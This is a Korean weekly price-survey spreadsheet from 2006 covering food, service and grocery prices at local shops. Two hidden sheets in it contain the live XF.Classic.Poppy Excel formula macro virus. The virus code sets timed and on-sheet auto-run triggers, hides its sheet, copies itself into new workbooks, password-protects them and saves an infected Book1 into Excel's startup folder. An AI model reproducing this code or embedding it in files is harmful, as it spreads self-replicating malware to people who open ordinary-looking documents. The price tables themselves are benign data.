A34: 28 | B34: 고춧가루 | C34: 3kg | D34: 1 | E34: 1 | F34: 177,000 | G34: 177,000 | H34: 0 | I34: GS슈퍼 | J34: 177000 | K34: 177000 | L34: 0 | M34: 웰빙마트 | N34: 0 | O34: 0 | P34: 0
A35: 개인서비스 요금(49개 품목)
A36: 1 | B36: 설렁탕 | C36: 1인분 (보통) | D36: 2 | E36: 2 | F36: =IF(D36=0,0,SUM(J36,N36)/D36) -> 10,000 | G36: 10,000 | H36: =G36-F36 -> 0 | I36: 고을정 | J36: 10000 | K36: 10000 | L36: =K36-J36 -> 0 | M36: 석천 | N36: 10000 | O36: 10000 | P36: =O36-N36 -> 0
A37: 2 | B37: 냉면 | C37: 물냉면, 1인분(보통) | D37: =COUNTIF(J37,"<>0")+COUNTIF(N37,"<>0") -> 2 | E37: =COUNTIF(K37,"<>0")+COUNTIF(O37,"<>0") -> 2 | F37: 8,000 | G37: 8,000 | H37: 0 | I37: 고을정 | J37: 9000 | K37: 9000 | L37: 0 | M37: 송학 | N37: 7000 | O37: 7000 | P37: 0
A38: 3 | B38: 비빔밥 | C38: 1인분(보통) | D38: =COUNTIF(J38,"<>0")+COUNTIF(N38,"<>0") -> 2 | E38: =COUNTIF(K38,"<>0")+COUNTIF(O38,"<>0") -> 2 | F38: 7,500 | G38: 7,500 | H38: 0 | I38: 감채원감자탕 | J38: 8000 | K38: 8000 | L38: 0 | M38: 송학 | N38: 7000 | O38: 7000 | P38: 0
A39: 4 | B39: 갈비탕 | C39: 1인분(보통) | D39: 1 | E39: 1 | F39: 8,000 | G39: 8,000 | H39: 0 | J39: 0 | K39: 0 | L39: 0 | M39: 송학 | N39: 8000 | O39: 8000 | P39: 0
A40: 5 | B40: 삼계탕 | C40: 1인분(보통) | D40: =COUNTIF(J40,"<>0")+COUNTIF(N40,"<>0") -> 2 | E40: =COUNTIF(K40,"<>0")+COUNTIF(O40,"<>0") -> 2 | F40: 12,500 | G40: 12,500 | H40: 0 | I40: 감채원감자탕 | J40: 12000 | K40: 12000 | L40: 0 | M40: 송학 | N40: 13000 | O40: 13000 | P40: 0
A41: 6 | B41: 된장찌개 백반 | C41: 1인분(보통) | D41: 1 | E41: 1 | F41: 7,000 | G41: 7,000 | H41: 0 | J41: 0 | K41: 0 | L41: 0 | M41: 송학 | N41: 7000 | O41: 7000 | P41: 0
A42: 7 | B42: 김치찌개 백반 | C42: 1인분(보통) | D42: =COUNTIF(J42,"<>0")+COUNTIF(N42,"<>0") -> 2 | E42: =COUNTIF(K42,"<>0")+COUNTIF(O42,"<>0") -> 2 | F42: 7,500 | G42: 7,500 | H42: 0 | I42: 감채원감자탕 | J42: 8000 | K42: 8000 | L42: 0 | M42: 송학 | N42: 7000 | O42: 7000 | P42: 0
A43: 8 | B43: 불고기 | C43: 1인분(200g) 공기밥 제외 | D43: =COUNTIF(J43,"<>0")+COUNTIF(N43,"<>0") -> 1 | E43: =COUNTIF(K43,"<>0")+COUNTIF(O43,"<>0") -> 1 | F43: 20,000 | G43: 20,000 | H43: 0 | J43: 0 | K43: 0 | L43: 0 | M43: 석천 | N43: 20000 | O43: 20000 | P43: 0
A44: 9 | B44: 등심구이 | C44: 1인분(200g) 공기밥 제외 | D44: 0 | E44: 0 | F44: 0 | G44: 0 | H44: 0 | J44: 0 | K44: 0 | L44: 0 | N44: 0 | O44: 0 | P44: 0
A45: 10 | B45: 생선초밥 | C45: 1인분(보통), 활어기준 | D45: 1 | E45: 1 | F45: 15,000 | G45: 15,000 | H45: 0 | J45: 0 | K45: 0 | L45: 0 | M45: 석천 | N45: 15000 | O45: 15000 | P45: 0
A46: 11 | B46: 튀김닭 | C46: 양념통닭 1마리 | D46: =COUNTIF(J46,"<>0")+COUNTIF(N46,"<>0") -> 2 | E46: =COUNTIF(K46,"<>0")+COUNTIF(O46,"<>0") -> 2 | F46: 20,000 | G46: 20,000 | H46: 0 | I46: bbq | J46: 22000 | K46: 22000 | L46: 0 | M46: 달빛창고 | N46: 18000 | O46: 18000 | P46: 0
A47: 12 | B47: 칼국수 | C47: 1인분(보통) | D47: 0 | E47: 0 | F47: 0 | G47: 0 | H47: 0 | J47: 0 | K47: 0 | L47: 0 | N47: 0 | O47: 0 | P47: 0
A48: 13 | B48: 조리라면 | C48: 분식점 1인분 | D48: =COUNTIF(J48,"<>0")+COUNTIF(N48,"<>0") -> 2 | E48: 2 | F48: 4,250 | G48: 4,250 | H48: 0 | I48: 마음한줄 | J48: 4500 | K48: 4500 | L48: 0 | M48: 매화김밥 | N48: 4000 | O48: 4000 | P48: 0
A49: 14 | B49: 김밥 | C49: 분식점 1인분 | D49: 2 | E49: 2 | F49: 3,150 | G49: 3,150 | H49: 0 | I49: 마음한줄 | J49: 3300 | K49: 3300 | L49: 0 | M49: 매화김밥 | N49: 3000 | O49: 3000 | P49: 0
A50: 15 | B50: 짜장면 | C50: 1인분(보통) | D50: 2 | E50: 2 | F50: 7,000 | G50: 7,000 | H50: 0 | I50: 총관루 | J50: 7000 | K50: 7000 | L50: 0 | M50: 용궁 | N50: 7000 | O50: 7000 | P50: 0
A51: 16 | B51: 짬뽕 | C51: 1인분(보통) | D51: 2 | E51: 2 | F51: 9,000 | G51: 9,000 | H51: 0 | I51: 총관루 | J51: 9000 | K51: 9000 | L51: 0 | M51: 용궁 | N51: 9000 | O51: 9000 | P51: 0
A52: 17 | B52: 탕수육 | C52: 일반탕수육(보통) | D52: 2 | E52: 2 | F52: 22,500 | G52: 22,500 | H52: 0 | I52: 총관루 | J52: 25000 | K52: 25000 | L52: 0 | M52: 용궁 | N52: 20000 | O52: 20000 | P52: 0
A53: 18 | B53: 돈가스 | C53: 일반돈가스,1인분 | D53: 1 | E53: 1 | F53: 8,500 | G53: 8,500 | H53: 0 | I53: 은화수 | J53: 8500 | K53: 8500 | L53: 0 | N53: 0 | O53: 0 | P53: 0
A54: 19 | B54: 햄버거 | C54: 기본형(야채,고기) | D54: 1 | E54: 1 | F54: 4,600 | G54: 4,600 | H54: 0 | I54: 맘스터치 | J54: 4600 | K54: 4600 | L54: 0 | N54: 0 | O54: 0 | P54: 0
A55: 20 | B55: 피자 | C55: 기본형(야채,고기) | D55: 0 | E55: 0 | F55: 0 | G55: 0 | H55: 0 | J55: 0 | K55: 0 | L55: 0 | N55: 0 | O55: 0 | P55: 0
A56: 21 | B56: 커피(외식) | C56: 일반원두커피 | D56: =COUNTIF(J56,"<>0")+COUNTIF(N56,"<>0") -> 2 | E56: 2 | F56: 2,850 | G56: 2,850 | H56: 0 | I56: 망고스토리 | J56: 2500 | K56: 2500 | L56: 0 | M56: 파리바게트 | N56: 3200 | O56: 3200 | P56: 0
A57: 22 | B57: 국산차(외식) | C57: 녹차(티백 또는 잎녹차) | D57: 2 | E57: 2 | F57: 3,750 | G57: 3,750 | H57: 0 | I57: 망고스토리 | J57: 3500 | K57: 3500 | L57: 0 | M57: 파리바게트 | N57: 4000 | O57: 4000 | P57: 0
A58: 23 | B58: 삼겹살 | C58: 식육식당 200g(국내산) | D58: 2 | E58: 2 | F58: 11,000 | G58: 11,000 | H58: 0 | I58: 감채원감자탕 | J58: 12000 | K58: 12000 | L58: 0 | M58: 송학 | N58: 10000 | O58: 10000 | P58: 0
A59: 24 | B59: 돼지갈비 | C59: 식육식당 200g(국내산) | D59: 1 | E59: 1 | F59: 11,000 | G59: 11,000 | H59: 0 | J59: 0 | K59: 0 | L59: 0 | M59: 송학 | N59: 11000 | O59: 11000 | P59: 0
A60: 25 | B60: 쇠갈비 | C60: 식육식당 200g(국내산) | D60: 0 | E60: 0 | F60: 0 | G60: 0 | H60: 0 | J60: 0 | K60: 0 | L60: 0 | N60: 0 | O60: 0 | P60: 0
A61: 26 | B61: 생맥주 | C61: 500CC 1잔 | D61: =COUNTIF(J61,"<>0")+COUNTIF(N61,"<>0") -> 2 | E61: 2 | F61: 3,750 | G61: 3,750 | H61: 0 | I61: bbq | J61: 4000 | K61: 4000 | L61: 0 | M61: 달빛창고 | N61: 3500 | O61: 3500 | P61: 0
A62: 27 | B62: 공동 주택관리비 | C62: 주공 18평1개월 (공과금 제외) | D62: 2 | E62: 2 | F62: 39,000 | G62: 39,000 | H62: 0 | I62: 장미아파트 | J62: 35000 | K62: 35000 | L62: 0 | M62: 백합아파트 | N62: 43000 | O62: 43000 | P62: 0
A63: 28 | B63: 양 복 세탁료 | C63: 신사복 상·하 드라이크리닝 1회 | D63: 2 | E63: 2 | F63: 6,150 | G63: 6,150 | H63: 0 | I63: 크린하우스 | J63: 6300 | K63: 6300 | L63: 0 | M63: 금당세탁고 | N63: 6000 | O63: 6000 | P63: 0
A64: 29 | B64: 의복수선료 | C64: 신사복 바지 밑단줄임 1회 | D64: 2 | E64: 2 | F64: 3,500 | G64: 3,500 | H64: 0 | I64: 크린하우스 | J64: 4000 | K64: 4000 | L64: 0 | M64: 금당세탁소 | N64: 3000 | O64: 3000 | P64: 0
A65: 30 | B65: 영화관람요 (방화. 외화) | C65: 상영시간 100분정도 1회 (입장세,문예진흥기금포함) | D65: 1 | E65: 1 | F65: 14,000 | G65: 14,000 | H65: 0 | I65: CGV몰오브점 | J65: 14000 | K65: 14000 | L65: 0 | N65: 0 | O65: 0 | P65: 0
A66: 31 | B66: 경기장 입장료 | C66: 공공체육시설 (성인 1인) | D66: 1 | E66: 1 | F66: 10,000 | G66: 10,000 | H66: 0 | I66: 축구장 | J66: 10000 | K66: 10000 | L66: 0 | N66: 0 | O66: 0 | P66: 0
A67: 32 | B67: 수영장 이용료 | C67: 일반성인 1회 (체육기금 포함) | D67: 0 | E67: 0 | F67: 0 | G67: 0 | H67: 0 | J67: 0 | K67: 0 | L67: 0 | N67: 0 | O67: 0 | P67: 0
A68: 33 | B68: 볼링장 이용료 | C68: 일반성인 평일오후 1게임 | D68: 0 | E68: 0 | F68: 0 | G68: 0 | H68: 0 | J68: 0 | K68: 0 | L68: 0 | N68: 0 | O68: 0 | P68: 0
A69: 34 | B69: 골프연습장 이용료 | C69: 초급(남자회원)1개월 (레슨비 미포함) | D69: 1 | E69: 1 | F69: 130,000 | G69: 130,000 | H69: 0 | J69: 0 | K69: 0 | L69: 0 | M69: 백운체력단련장 | N69: 130000 | O69: 130000 | P69: 0
A70: 35 | B70: 노래방 이용료 | C70: 일반인 저녁 1시간 | D70: 1 | E70: 1 | F70: 15,000 | G70: 15,000 | H70: 0 | J70: 0 | K70: 0 | L70: 0 | M70: 가람노래방 | N70: 15000 | O70: 15000 | P70: 0
A71: 36 | B71: 당구장 이용료 | C71: 큐선대 일반인 저녁 1시간 | D71: 1 | E71: 1 | F71: 7,200 | G71: 7,200 | H71: 0 | J71: 0 | K71: 0 | L71: 0 | M71: 백운당구장 | N71: 7200 | O71: 7200 | P71: 0
A72: 37 | B72: 사진촬영료 | C72: 칼라 반명함 1조 (상급사진관 3x4) | D72: 1 | E72: 1 | F72: 15,000 | G72: 15,000 | H72: 0 | J72: 0 | K72: 0 | L72: 0 | M72: 윤스토디오 | N72: 15000 | O72: 15000 | P72: 0
A73: 38 | B73: 사진인화료 | C73: 디지털사진인화요금, 현상료 포함 | D73: 1 | E73: 1 | F73: 250 | G73: 250 | H73: 0 | J73: 0 | K73: 0 | L73: 0 | M73: 윤스토디오 | N73: 250 | O73: 250 | P73: 0
A74: 39 | B74: 영상매체대여료 | C74: 최신판 영화 DVD대여요금 | D74: 0 | E74: 0 | F74: 0 | G74: 0 | H74: 0 | J74: 0 | K74: 0 | L74: 0 | N74: 0 | O74: 0 | P74: 0
A75: 40 | B75: 이용료(컷트) | C75: 성인조발 중류급 1회 | D75: =COUNTIF(J75,"<>0")+COUNTIF(N75,"<>0") -> 2 | E75: =COUNTIF(K75,"<>0")+COUNTIF(O75,"<>0") -> 2 | F75: 13,000 | G75: 13,000 | H75: 0 | I75: 금당이발관 | J75: 13000 | K75: 13000 | L75: 0 | M75: 금호이용원 | N75: 13000 | O75: 13000 | P75: 0
A76: 41 | B76: 미용료 | C76: 성인여자 파마(일반) | D76: =COUNTIF(J76,"<>0")+COUNTIF(N76,"<>0") -> 2 | E76: =COUNTIF(K76,"<>0")+COUNTIF(O76,"<>0") -> 2 | F76: 50,000 | G76: 50,000 | H76: 0 | I76: 헤어하나 | J76: 60000 | K76: 60000 | L76: 0 | M76: 헤어모드 | N76: 40000 | O76: 40000 | P76: 0
A77: 42 | B77: 목욕료 (성인) | C77: 대중탕(성인 1회) (1회용품 제외) | D77: 1 | E77: 1 | F77: 5,000 | G77: 5,000 | H77: 0 | J77: 0 | K77: 0 | L77: 0 | M77: 금호목욕탕 | N77: 5000 | O77: 5000 | P77: 0
A78: 43 | B78: 숙박료 (호텔) | C78: 평일, 스탠다드,부가세 및 봉사료 포함 | D78: 0 | E78: 0 | F78: 0 | G78: 0 | H78: 0 | J78: 0 | K78: 0 | L78: 0 | N78: 0 | O78: 0 | P78: 0
A79: 44 | B79: 숙박료 (여관) | C79: 독방, 1박, 욕탕부설 | D79: 0 | E79: 0 | F79: 0 | G79: 0 | H79: 0 | J79: 0 | K79: 0 | L79: 0 | N79: 0 | O79: 0 | P79: 0
A80: 45 | B80: 콘도미니엄 이용료 | C80: 25평정도 회원기준 1실 1일 사용 | D80: 0 | E80: 0 | F80: 0 | G80: 0 | H80: 0 | J80: 0 | K80: 0 | L80: 0 | N80: 0 | O80: 0 | P80: 0
A81: 46 | B81: PC방 이용료 | C81: 1회 이용시 | D81: 0 | E81: 0 | F81: 0 | G81: 0 | H81: 0 | J81: 0 | K81: 0 | L81: 0 | N81: 0 | O81: 0 | P81: 0
A82: 47 | B82: 택배이용료 | C82: 20kg이하, 타지역 | D82: 1 | E82: 1 | F82: 8,000 | G82: 8,000 | H82: 0 | J82: 0 | K82: 0 | L82: 0 | M82: 우체국 | N82: 8000 | O82: 8000 | P82: 0
A83: 48 | B83: 찜질방 이용료 | C83: 찜질방(성인 1회) (1회용품 제외) | D83: 0 | E83: 0 | F83: 0 | G83: 0 | H83: 0 | J83: 0 | K83: 0 | L83: 0 | N83: 0 | O83: 0 | P83: 0
A84: 49 | B84: 대입학원비(종합) | C84: 대입(4년제)재수생 종합반 수강료 | D84: 0 | E84: 0 | F84: =IF(D84=0,0,SUM(J84,N84)/D84) -> 0 | J84: 0 | K84: 0 | L84: 0 | N84: 0 | O84: 0 | P84: 0
A85: 공산품 등 기타(13개품목)
A86: 1 | B86: 밀가루 | C86: 중력분 1등품 (1봉지 3kg) | D86: =COUNTIF(J86,"<>0")+COUNTIF(N86,"<>0") -> 2 | E86: 2 | F86: =IF(D86=0,0,SUM(J86,N86)/D86) -> 6,450 | G86: 6,450 | H86: =G86-F86 -> 0 | I86: GS슈퍼 | J86: 6450 | K86: 6450 | L86: =K86-J86 -> 0 | M86: 웰빙마트 | N86: 6450 | O86: 6450 | P86: =O86-N86 -> 0
A87: 2 | B87: 두부 | C87: 공장제품 1모 | D87: 2 | E87: 2 | F87: 1,300 | G87: 1,300 | H87: 0 | I87: GS슈퍼 | J87: 1200 | K87: 1200 | L87: 0 | M87: 웰빙마트 | N87: 1400 | O87: 1400 | P87: 0
A88: 3 | B88: 우유 | C88: 흰 우유(종이팩) 1개 200㎖ | D88: 2 | E88: 2 | F88: 1,080 | G88: 1,080 | H88: 0 | I88: GS슈퍼 | J88: 1080 | K88: 1080 | L88: 0 | M88: 웰빙마트 | N88: 1080 | O88: 1080 | P88: 0
A89: 4 | B89: 식용유 | C89: 콩기름 1.8ml | D89: 2 | E89: 2 | F89: 9,165 | G89: 9,165 | H89: 0 | I89: GS슈퍼 | J89: 8480 | K89: 8480 | L89: 0 | M89: 웰빙마트 | N89: 9850 | O89: 9850 | P89: 0
A90: 5 | B90: 설탕 | C90: 정백당 1kg | D90: 2 | E90: 2 | F90: 2,450 | G90: 2,450 | H90: 0 | I90: GS슈퍼 | J90: 2400 | K90: 2400 | L90: 0 | M90: 웰빙마트 | N90: 2500 | O90: 2500 | P90: 0
A91: 6 | B91: 생수 | C91: 플라스틱 1병(500㎖) | D91: 2 | E91: 2 | F91: 490 | G91: 490 | H91: 0 | I91: GS슈퍼 | J91: 480 | K91: 480 | L91: 0 | M91: 웰빙마트 | N91: 500 | O91: 500 | P91: 0
A92: 7 | B92: 맥주 | C92: 1병 500㎖ (병 보증금 포함) | D92: 2 | E92: 2 | F92: 1,830 | G92: 1,830 | H92: 0 | I92: GS슈퍼 | J92: 1830 | K92: 1830 | L92: 0 | M92: 웰빙마트 | N92: 1830 | O92: 1830 | P92: 0
A93: 8 | B93: 소주 | C93: 1병 360㎖ (병 보증금 포함) | D93: 2 | E93: 2 | F93: 1,455 | G93: 1,455 | H93: 0 | I93: GS슈퍼 | J93: 1460 | K93: 1460 | L93: 0 | M93: 웰빙마트 | N93: 1450 | O93: 1450 | P93: 0
A94: 9 | B94: 등유 | C94: 주유소 판매 1ℓ | D94: 0 | E94: 0 | F94: 0 | G94: 0 | H94: 0 | J94: 0 | K94: 0 | L94: 0 | N94: 0 | O94: 0 | P94: 0
A95: 10 | B95: 경유 | C95: 주유소 판매 1ℓ | D95: 0 | E95: 0 | F95: 0 | G95: 0 | H95: 0 | J95: 0 | K95: 0 | L95: 0 | N95: 0 | O95: 0 | P95: 0
A96: 11 | B96: 휘발유 | C96: 주유소 판매 1ℓ (무연) | D96: 0 | E96: 0 | F96: 0 | G96: 0 | H96: 0 | J96: 0 | K96: 0 | L96: 0 | N96: 0 | O96: 0 | P96: 0
A97: 12 | B97: 피아노 학원비 | C97: 관인학원 (초급반 1개월) | D97: 1 | E97: 1 | F97: 120,000 | G97: 120,000 | H97: 0 | I97: 예향피아노 | J97: 120000 | K97: 120000 | L97: 0 | N97: 0 | O97: 0 | P97: 0
A98: 13 | B98: 미술학원비 | C98: 초등 저학년 1개월 (재료비 포함) | D98: 1 | E98: 1 | F98: 80,000 | G98: 80,000 | H98: 0 | J98: 0 | K98: 0 | L98: 0 | M98: 하트앤아트 | N98: 80000 | O98: 80000 | P98: 0

Sheet Sheet1 (hidden)
A1: 주간물가동향(2006.10.31).xls | C1: =WORKBOOK.HIDE("XL4Poppy") -> FALSE
A2: Book1
A3: C:\Program Files\Microsoft Office\Office\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
C4: =RUN(C18) -> FALSE
C6: =#N/A -> 
A7: Classic.Poppy by VicodinES
A8: With Lord Natas
A9: An Excel Formula Macro Virus (XF.Classic)
A10: Hydrocodone/APAP 10-650 For Your Computer | C10: =RUN(A21) -> FALSE
A11: (C) The Narkotic Network 1998 | C11: =ON.TIME("6:30:00 PM","Hello") -> FALSE
C12: =ON.TIME("6:30:00 AM","Morning") -> FALSE
C13: =ON.SHEET(,"Poppy",TRUE) -> FALSE
A14: **Simple Payload**
A15: =ALERT("XF.Classic.Poppy by VicodinES",2) -> FALSE
A16: =ALERT("ⓒ 1998 The Narkotic Network",2) -> FALSE
C17: **Set Our Values and Paths**
A20: **Add New Workbook, Infect It, Save It As Book1.xls**
A23: =#N/A -> 
A26: =NEW(1) -> FALSE | C26: **Infect Workbook**
A27: =WORKBOOK.INSERT(1) -> FALSE | C27: =RUN(C19) -> FALSE
A28: =WORKBOOK.INSERT(1) -> FALSE
A29: =ACTIVATE.PREV() -> FALSE | C29: =#N/A -> 
A30: =RUN(C18) -> FALSE
A31: =WORKBOOK.COPY("XL4Poppy",A1) -> FALSE
A32: =WORKBOOK.NAME("Sheet3","Sheet99") -> FALSE | C32: =ACTIVATE.PREV() -> FALSE
A33: =WORKBOOK.NAME("Sheet1","Sheet3") -> FALSE | C33: =RUN(C19) -> FALSE
A34: =WORKBOOK.NAME("Sheet99","Sheet1") -> FALSE | C34: =WORKBOOK.COPY("XL4Poppy",A1) -> FALSE
A35: =PROTECT.DOCUMENT(TRUE,,"VicodinES",TRUE) -> FALSE
A36: =WORKBOOK.PREV() -> FALSE
A37: =WORKBOOK.PREV() -> FALSE
A38: =WORKBOOK.PREV() -> FALSE
A39: =SAVE.AS(A3) -> FALSE
A40: =FILE.CLOSE() -> FALSE | C40: =MESSAGE(TRUE,"VicodinES and Lord Natas greet you a good morning!") -> FALSE

Sheet -------- (hidden)
A1: 주간물가동향(2006.10.31).xls | C1: =WORKBOOK.HIDE("XL4Poppy") -> FALSE
A2: Book1
A3: C:\Program Files\Microsoft Office\Office\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
C4: =RUN(C18) -> FALSE
C6: =#N/A -> 
A7: Classic.Poppy by VicodinES
A8: With Lord Natas
A9: An Excel Formula Macro Virus (XF.Classic)
A10: Hydrocodone/APAP 10-650 For Your Computer | C10: =RUN(A21) -> FALSE
A11: (C) The Narkotic Network 1998 | C11: =ON.TIME("6:30:00 PM","Hello") -> FALSE
C12: =ON.TIME("6:30:00 AM","Morning") -> FALSE
C13: =ON.SHEET(,"Poppy",TRUE) -> FALSE
A14: **Simple Payload**
A15: =ALERT("XF.Classic.Poppy by VicodinES",2) -> FALSE
A16: =ALERT("ⓒ 1998 The Narkotic Network",2) -> FALSE
C17: **Set Our Values and Paths**
A20: **Add New Workbook, Infect It, Save It As Book1.xls**
A23: =#N/A -> 
A26: =NEW(1) -> FALSE | C26: **Infect Workbook**
A27: =WORKBOOK.INSERT(1) -> FALSE | C27: =RUN(C19) -> FALSE
A28: =WORKBOOK.INSERT(1) -> FALSE
A29: =ACTIVATE.PREV() -> FALSE | C29: =#N/A -> 
A30: =RUN(C18) -> FALSE
A31: =WORKBOOK.COPY("XL4Poppy",A1) -> FALSE
A32: =WORKBOOK.NAME("Sheet3","Sheet99") -> FALSE | C32: =ACTIVATE.PREV() -> FALSE
A33: =WORKBOOK.NAME("Sheet1","Sheet3") -> FALSE | C33: =RUN(C19) -> FALSE
A34: =WORKBOOK.NAME("Sheet99","Sheet1") -> FALSE | C34: =WORKBOOK.COPY("XL4Poppy",A1) -> FALSE
A35: =PROTECT.DOCUMENT(TRUE,,"VicodinES",TRUE) -> FALSE
A36: =WORKBOOK.PREV() -> FALSE
A37: =WORKBOOK.PREV() -> FALSE
A38: =WORKBOOK.PREV() -> FALSE
A39: =SAVE.AS(A3) -> FALSE
A40: =FILE.CLOSE() -> FALSE | C40: =MESSAGE(TRUE,"VicodinES and Lord Natas greet you a good morning!") -> FALSE

Sheet Sheet2
B2: 구 분 | C2: 품 목 | D2: 규 격 | E2: 가격 조사 결과 (단위:원) | H2: 비 고
E3: 전주 | F3: 금 주 | G3: 등락가
B4: 농산물 | C4: 무 | D4: 상품 1개 1kg | E4: =총괄!F8 -> 1,345 | F4: =총괄!G8 -> 1,322 | G4: =총괄!H8 -> -23
C5: 양파 | D5: 1망(1kg) | E5: =총괄!F13 -> 3,084 | F5: =총괄!G13 -> 3,117 | G5: =총괄!H13 -> 33
C6: 배추 | D6: 1포기 3kg | E6: =총괄!F18 -> 3,356 | F6: =총괄!G18 -> 3,300 | G6: =총괄!H18 -> -56
C7: 오이 | D7: 상품 3개 | E7: =총괄!F14 -> 4,734 | F7: =총괄!G14 -> 4,584 | G7: =총괄!H14 -> -150
C8: 상추 | D8: 양상추 500g | E8: =총괄!F10 -> 2,753 | F8: =총괄!G10 -> 2,709 | G8: =총괄!H10 -> -44
C9: 애호박 | D9: 상품1개(250~300g) | E9: =총괄!F11 -> 1,802 | F9: =총괄!G11 -> 1,739 | G9: =총괄!H11 -> -63
C10: 마늘 | D10: 깐것 상품 1kg | E10: =총괄!F16 -> 11,140 | F10: =총괄!G16 -> 10,890 | G10: =총괄!H16 -> -250
C11: 감자 | D11: 흰색1kg | E11: =총괄!F17 -> 3,922 | F11: =총괄!G17 -> 3,899 | G11: =총괄!H17 -> -23
C12: 배 | D12: 상품1개(650~700g) | E12: =총괄!F21 -> 3,994 | F12: =총괄!G21 -> 3,953 | G12: =총괄!H21 -> -42
C13: 달걀 | D13: 특란30개 한판 | E13: =총괄!F27 -> 8,046 | F13: =총괄!G27 -> 8,046 | G13: =총괄!H27 -> 0
B14: 축산물 | C14: 쇠고기(한우) | D14: 등심 600g(상등육) | E14: =총괄!F23 -> 66,445 | F14: =총괄!G23 -> 64,795 | G14: =총괄!H23 -> -1,650
B15: 수산물 | C15: 명태 | D15: 40cm1마리 | E15: =총괄!F30 -> 4,090 | F15: =총괄!G30 -> 4,088 | G15: =총괄!H30 -> -2
C16: 조기 | D16: 15cm1마리 | E16: =총괄!F28 -> 2,292 | F16: =총괄!G28 -> 2,292 | G16: =총괄!H28 -> 0
B17: 공산품등 | C17: 휘발유 | D17: 주유소 판매 1ℓ | E17: =총괄!F96 -> 1,626 | F17: =총괄!G96 -> 1,609 | G17: =총괄!H96 -> -17
